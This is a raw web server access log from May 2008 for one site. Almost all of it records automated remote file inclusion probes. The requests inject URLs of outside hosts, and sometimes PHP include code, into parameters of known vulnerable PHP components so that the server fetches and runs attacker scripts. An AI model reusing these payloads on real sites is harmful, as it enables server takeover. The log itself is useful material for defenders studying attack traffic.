83.103.23.40 - - [05/May/2008:12:21:06 -0700] "GET /logs/index.php?ir=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:12:21:17 -0700] "GET /index.php?ir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:12:21:19 -0700] "GET /index.php?ir=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:12:21:54 -0700] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:22:05 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:22:10 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:22:24 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:22:24 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:22:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:22:25 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:22:25 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:12:22:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cdpm3.com/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:22:30 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.190.195.101 - - [05/May/2008:12:22:43 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.103 - - [05/May/2008:12:22:47 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://Demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.68.51 - - [05/May/2008:12:22:56 -0700] "GET /logs/start.php?s=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.115.68.51 - - [05/May/2008:12:22:56 -0700] "GET /start.php?s=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:23:06 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:23:06 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [05/May/2008:12:23:18 -0700] "GET /logs/access_080218.log/modules/My_eGallery/index.php?basepath=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:12:24:04 -0700] "GET /logs/index.php?subp=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:12:24:04 -0700] "GET /logs/index.php?subp=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:12:24:05 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:12:24:05 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:12:24:06 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:24:06 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:12:24:10 -0700] "GET /index.php?subp=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [05/May/2008:12:24:15 -0700] "GET /index.php?subp=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.190 - - [05/May/2008:12:24:19 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:24:20 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:24:21 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:24:21 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:24:21 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:24:22 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:24:22 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:24:22 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:12:24:23 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:24:48 -0700] "GET /logs/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:24:49 -0700] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.168 - - [05/May/2008:12:25:03 -0700] "GET /funny/?M=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:12:25:03 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.215.56 - - [05/May/2008:12:25:28 -0700] "GET /errors.php?error=http://ces.afrohost.net/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
213.193.215.56 - - [05/May/2008:12:25:28 -0700] "GET /logs/errors.php?error=http://ces.afrohost.net/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:12:25:38 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:12:25:38 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:12:25:38 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.87.167.19 - - [05/May/2008:12:25:43 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:26:17 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.68.51 - - [05/May/2008:12:26:20 -0700] "GET /sub.php?menu=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:12:26:23 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:26:25 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:26:25 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:26:32 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:27:27 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:27:59 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:28:10 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:28:10 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:12:28:11 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:28:15 -0700] "GET /logs/access_080218.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:28:19 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:28:34 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.68.51 - - [05/May/2008:12:29:27 -0700] "GET /sub.php?s=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.231.1.242 - - [05/May/2008:12:29:44 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.242 - - [05/May/2008:12:29:45 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.242 - - [05/May/2008:12:29:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.16.185 - - [05/May/2008:12:29:50 -0700] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:30:48 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:30:49 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:30:49 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:30:52 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:30:52 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:30:52 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:31:21 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [05/May/2008:12:31:30 -0700] "GET /avatar.php?page=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:32:49 -0700] "GET /logs/access_080116.log/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:12:32:58 -0700] "GET /logs/access_080104.log/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.geocities.com/fitra.yulia/indah.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [05/May/2008:12:33:08 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [05/May/2008:12:33:18 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.180.69 - - [05/May/2008:12:33:53 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/bdefdp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:33:54 -0700] "GET /logs/access_080228.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:33:55 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:33:55 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:33:55 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:33:55 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:03 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:12:34:06 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:12:34:06 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:12:34:07 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:14 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.16.29.227 - - [05/May/2008:12:34:15 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:24 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:24 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:34:36 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:34:36 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:34:36 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:37 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:34:39 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:34:39 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:34:39 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:39 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:40 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.193.215.56 - - [05/May/2008:12:34:41 -0700] "GET /logs/errors.php?error=http://ces.afrohost.net/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.193.215.56 - - [05/May/2008:12:34:42 -0700] "GET /errors.php?error=http://ces.afrohost.net/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:46 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:46 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:34:51 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:52 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [05/May/2008:12:34:54 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
